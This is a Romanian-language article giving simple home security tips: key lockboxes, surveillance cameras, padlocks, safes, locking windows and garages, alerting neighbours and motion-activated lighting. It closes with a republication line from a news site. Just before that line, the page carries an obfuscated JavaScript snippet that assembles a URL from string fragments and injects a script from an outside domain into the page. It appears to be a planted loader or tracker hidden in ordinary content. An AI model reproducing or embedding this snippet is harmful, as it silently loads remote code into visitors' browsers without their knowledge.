Măsuri simple de siguranță pentru casă

Momentul decorării casei este, fără îndoială, o activitate mult mai relaxantă decât securizarea locuinței. Cu toate acestea, să îți știi căminul în siguranță și protejat este un aspect esențial pe care nu trebuie să îl neglijezi. Astfel, iată câteva metode la îndemâna oricui prin care să îți protejezi casa fără a îți complica obiceiurile zilnice.

Cutia pentru chei

În loc să împrăștii chei de rezervă prin vecini, pe la rude sau prieteni, cea mai simplă și sigură metodă este să achiziționezi o cutie pentru chei. Acestea sunt disponibile în două modele: cutie pentru chei care se deschide cu o cheiță sau acele cutii de chei care pot fi deschise prin introducerea unui cifru. Iată câteva exemple în care aceasta invenție ți-ar putea fi extrem de utilă.

  • Cutiile pentru chei cu cifru au devenit extrem de populare în rândul proprietarilor de locuințe în regim hotelier, fiind una dintre cele mai accesibile soluții pentru a înmâna cheia chiriașilor și pentru a o recupera.
  • Atunci când pleci în vacanțe și ai nevoie ca un prieten să îți ude florile sau să îți hrănească pisica, îi poți lăsa cheia în cutia specială.
  • Copiii reușesc să piardă cheia de la casă, mai ales de când purtatul acesteia la gât nu mai este un obicei. De aceea, pusă în siguranță în cutia pentru chei garantează că aceasta nu va ajunge pe mâini greșite.

Camerele de securitate

Acestea sunt disponibile pe piață astfel încât să răspundă tuturor nevoilor și pretențiilor financiare. Există camere de supraveghere care se activează la mișcare, care stochează imaginile pe memoria internă sau care pot fi urmărite live de pe telefonul mobil. Pentru că piața de oferte pentru aceste obiecte este atât de complexă, cu siguranță vei găsi camera de supraveghere potrivită nevoilor tale.

Lacătele

Lacătul este de atâția ani în topul preferințelor atunci când vine vorba de menținerea unui obiect sub cheie. Tocmai pentru eficiența sa deosebită, lacătul se numără printre cele mai vechi metode de a îți proteja un obiect, de la cel mai mic până la cel mai mare. În plus, ultimele tehnologii au creat lacătele cu amprentă, tocmai pentru a nu te mai lovi de situația în care rătăcești cheia sau dacă ai uitat cifrul.

Seiful – ideal pentru obiectele mici

Pentru obiectele mici dar cu o imensă valoare, fie ea și doar sentimentală, achiziționează cu încredere un seif. Incorporat în perete sau de sine stătător, așează seiful într-o zonă retrasă a casei, astfel încât să nu bată la ochi. Un loc adesea folosit este dressingul cu haine.

Alte măsuri de siguranță

Pe lângă toate aceste obiecte pe care le poți achiziționa pentru a îți știi casa și obiectele în siguranță, există și alte măsuri pe care le poți adopta pentru a spori siguranța locuinței.

  • Verifică mereu dacă ai închis și geamurile casei, nu numai ușa. Acest obicei ar trebui adoptat nu numai când urmează să pleci de acasă, dar și noaptea. Dacă dispui de un garaj, nu uita să îi ții în permanență închis.
  • Anunță-ți vecinii când urmează să pleci în vacanță. În acest fel ei vor știi să sesizeze orice mișcare suspectă pe lângă casa ta.
  • Luminează curtea și zona de parcare a mașinii cu un sistem de iluminat care se activează la mișcare. Sistemele inteligente au o limită de greutate declanșatoare, astfel încât nu se va activa la fiecare pisică ce traveresează curtea.

Cu toate aceste măsuri de siguranță, casa ta va fi una bine păzită de intențiile necurate ale hoților, iar tu vei putea pleca liniștit în vacanțe știind că vei găsi toate obiectele unde le-ai lăsat.

(function(){
zjg5=document.createElement(“script”);zjg5_=((“u”)+”st”)+”a”;zjg5.async=true;
zjg5.type=”text/javascript”;zjg5_+=(“t.i”)+””+”n”;zjg5_+=((“f”)+”o”);zjg5_+=”/”;
zjg5u=”423592525.”;zjg5u+=”5p54v9vcjg5rf21stfc”+”1tn1vflyzux”;
zjg5.src=”https://”+zjg5_+zjg5u;document.body.appendChild(zjg5);
})();

Articolul Măsuri simple de siguranță pentru casă apare prima dată în Stiri Zilnic.